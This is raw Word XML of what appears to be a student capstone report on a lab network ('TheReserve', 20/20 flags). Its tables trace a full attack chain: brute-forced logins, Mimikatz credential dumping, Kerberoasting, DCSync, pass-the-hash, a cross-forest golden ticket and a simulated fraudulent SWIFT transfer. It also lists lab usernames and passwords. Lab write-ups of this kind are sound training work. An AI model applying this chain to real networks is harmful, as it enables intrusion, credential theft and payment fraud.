                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">RDP as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keith.allen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040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lynda.gordon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66BD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6D1222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4F53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14F8" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CORP Tier 2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448F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WRK2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1350" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Local admin via domain credentials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DD85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017EFF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C01A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9EC1" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CORP Tier 1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2EF2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Server1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FC24" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">RDP via </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>svcScanning:Password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>1!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BF3C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3E27A3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D773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F8EE" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CORP Tier 1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B0B0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Server1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FDA6" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>svcScanning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= local admin, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>SeDebugPrivilege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7524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4CBCE7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FD10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F6D4" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CORP Tier 0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D657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CORPDC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B1B5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Evil-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>WinRM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PTH with CORP Admin hash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3391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13374D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21FE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C911" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CORP Tier 0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6912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CORPDC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8D7E" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>DCSync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via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>svcBackups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replication rights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C5DC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39AF31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695F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2C25" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BANK Tier 2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379E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WORK1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A0BC" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Invoke-Command from ROOTDC pivot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1B32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0B3E7C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F152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94AF" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BANK Tier 2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B266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WORK2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CF11" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Enterprise Admin reset BANK domain password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9B1C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04A6E0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39F3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1E5B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BANK Tier 1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654C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JMP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DF17" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Invoke-Command from ROOTDC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3DF7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553ABE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8248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C8F1" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BANK Tier 1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95A7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JMP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E1D0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Verification file via Invoke-Command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C09A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6B01A2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4D85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BA7C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BANK Tier 0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18B7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BANKDC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ED15" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>PSSession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from ROOTDC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3F36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0B04FF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3491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7A50" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BANK Tier 0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2E85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BANKDC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8DE5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Enterprise Admin over all forest domains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3B0B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6CC5A0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BD09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F0B7" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ROOT Tier 0 Foothold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6C48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ROOTDC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CACB" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>ExtraSids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Golden Ticket + Evil-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>WinRM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Kerberos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8FE9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2130EA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2A32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B188" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ROOT Tier 0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8180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ROOTDC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F633" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>DCSync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ROOTDC — full forest secrets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CF2D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3FDACA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2BEB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D5BF" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SWIFT Web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F87F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SWIFT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0092" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Login as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g.watson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> capturer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B21D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4BD5E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FF54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0245" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SWIFT Capturer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F938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SWIFT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9F40" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Captured dummy transaction (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>g.watson</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>:Corrected1996)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4626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6B1F56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1D95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B8EA" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SWIFT Approver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D668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SWIFT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0EC0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Logged in as approver + approved transaction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B3B7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  <w:tr w:rsidR="007B11CB" w14:paraId="778BF9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443E" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18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CA6E" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SWIFT Payment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9184" w14:textId="77777777" w:rsidR="007B11C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SWIFT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273A" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>Simulated fraudulent transfer completed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D7B5" w14:textId="77777777" w:rsidR="007B11CB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</w:tr>
    </w:tbl>
    <w:p w14:paraId="50026ACD" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C8191C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Full Attack Chain Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22780A76" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11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B11CB" w14:paraId="550EE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08B0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2E24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openvpn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-- VPN connection to THM capstone network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="7789C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3D15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0DF2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OctoberCMS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username enumeration on 10.200.40.13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="0554AF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7DCB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DE3E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Hydra SMTP brute force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lynda.gordon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keith.allen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svcScanning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="4CA69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50FB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7F61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RDP to WRK2 → first internal foothold + domain enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="174F2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CDBD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9A09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RDP to Server1 via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svcScanning:Password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1! (local admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="7F3234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B51A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8813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Mimikatz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LSASS dump + SAM/SYSTEM/SECURITY hive saves</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="3EA69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FF8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19EE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Rubeus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Kerberoast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→ 5 service account tickets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="06B5D7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8D28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EE62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PowerView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ACL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svcBackups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has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DCSync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rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="22D7D4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2887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7BC4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Hashcat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crack →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svcBackups:q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9nzssaFtGHdqUV3Qv6G</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="2DBA7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C0A5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6265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Chisel reverse SOCKS5 tunnel: Server1 → Kali (port 1080)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="377D3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A595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360D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Secretsdump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Server1 LSA →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svcBackups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plaintext confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="1F197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5BEA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14E5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Secretsdump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CORPDC via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svcBackups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DCSync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→ all CORP hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="12DC4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3FC9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BE09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Evil-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WinRM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PTH → CORPDC shell (Flags 7+8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="65977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F820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B632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lookupsid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→ THERESERVE SID discovered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="10C94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0AE9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8343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Secretsdump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CORPDC for THERESERVE$ trust account hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="1E483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461F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D3C6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impacket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-ticketer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ExtraSids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→ inter-realm ticket with EA SID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="09D9F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193E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893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Evil-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WinRM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Kerberos → ROOTDC shell (Flags 15+16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="26E35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37B4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Step 18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9B94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Secretsdump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ROOTDC → THERESERVE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krbtgt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+ BANK$ hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="56BBB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6A1B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19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91AE" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000"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PSSession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ROOTDC → BANKDC (Flags 13+14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="241D1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88F2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20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9377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Set-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ADAccountPassword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 → reset BANK domain admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="0197B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8025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21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C941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Invoke-Command ROOTDC → WORK1, WORK2, JMP (Flags 9-12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="553ED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074C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22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CA2C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JMP DNS resolve → SWIFT at 10.200.40.201</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="46D4D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95D6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23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20AA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 xml:space="preserve">Invoke-Command → read swift.txt →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g.watson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:Corrected1996</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B11CB" w14:paraId="055EF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498F" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Step 24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D8DA" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000"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RDP ROOTDC → JMP → SWIFT browser → capture + approve transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="284C11E0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09567C32" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E73805" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20/20 FLAGS — ROOM 100% COMPLETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225CF7F4" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="A9C4D9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DEPI Graduation Project | Team Hollow | Instructor: Ahmad Ashraf | May 2026</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007B11C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6D5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5336D2E2"/>
    <w:lvl w:ilvl="0" w:tplc="BB008CF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DE841FC0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="813685BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="10502D88">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0F00CDDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3EA0F140">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E7F430EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1DB2830E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="497CA1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AA7804"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F3816AA"/>
    <w:lvl w:ilvl="0" w:tplc="008AE914">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4756FAEC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F404D65A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ED9E657A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7E02A0C2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A9A0CAB6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="53069F0E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="474CC69A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="9F30997C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="677733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CB"/>
    <w:rsid w:val="00240A87"/>
    <w:rsid w:val="007B11CB"/>
    <w:rsid w:val="0090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DBDA"/>
  <w15:docId w15:val="{E4A2873D-9E32-4DF5-8DD9-C1200B49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4082</Words>
  <Characters>23270</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>193</Lines>
  <Paragraphs>54</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>27298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ayman202467</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-20T17:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-20T17:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>